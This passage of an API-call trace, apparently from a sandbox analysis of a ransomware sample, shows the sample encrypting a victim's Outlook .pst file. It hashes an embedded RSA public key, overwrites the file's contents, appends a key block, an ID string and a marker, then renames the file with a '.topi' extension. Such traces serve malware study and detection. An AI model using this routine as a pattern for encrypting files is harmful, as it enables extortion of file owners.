"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.187] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=271360) returned 1 [0096.187] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.190] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.190] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.191] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.191] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x25805, lpOverlapped=0x0) returned 1 [0096.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.194] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.194] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.194] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.194] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.194] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.194] GetLastError () returned 0x0 [0096.195] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.195] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.195] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.195] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.195] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25810) returned 0x9a06a00 [0096.197] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a025e8 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02630 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9870 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9888 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.198] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9888 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9888 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9870 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9888 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.199] GetCurrentThreadId () returned 0x8c4 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7920 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.199] GetCurrentThreadId () returned 0x8c4 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9870 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9888 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9858 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98a0 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9870 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98a0 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9888 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02630 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.202] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x25800, lpOverlapped=0x0) returned 1 [0096.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.203] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.203] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.237] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.237] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.237] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.238] CloseHandle (hObject=0x6a8) returned 1 [0096.240] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.240] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0096.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.240] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.topi")) returned 1 [0096.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.241] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.242] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, 